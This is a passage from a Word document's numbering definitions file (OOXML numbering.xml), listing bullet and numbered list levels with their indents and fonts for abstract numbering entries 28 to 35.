    <w:lvl w:ilvl="5" w:tplc="B1384860">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DF380796">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="806C4A6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8640AEAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A3F9AAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="40A20114">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CF86CEF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4242556C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="62C4857C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7E201A8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6CB0F334">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B008A958">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3C529158">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="57E8DF7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A4455ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="0D76EDAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7AE2949A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="72DAA434">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F2987B6A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="14D23820">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="82927E00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="63AE661C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9DE84EA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0854015A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D2A5FBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="D2140366">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A82C53A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3ECA4C44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5D4800E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="02C46522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="693A4398">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6E4253AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="34E0BCBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="327E9B72">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F1B66A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F864CE42"/>
    <w:lvl w:ilvl="0" w:tplc="50EA74F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Times New Roman" w:cs="Calibri"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2FF9BA2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EA885D6"/>
    <w:lvl w:ilvl="0" w:tplc="FEE6638A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E92484E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="33C224EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="106C777C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3DCE6306">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="62E8B2D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D1E49CB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="216EBEB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1AB63314">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3116D674"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="CC5688EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="915A9D48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="56743972">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="22C434A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E0A849F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="12165124">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6758F774">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E506CB5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BB04248E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34C4E436"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="25EC514A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F9503F86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6A60633E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D12E8F54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1DFA6F7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7DC46DCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A61ACA1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="92CAF2CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="25E63284">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34F56372"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D540869E"/>
    <w:lvl w:ilvl="0" w:tplc="7144A9CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6DC818D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7E669D04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
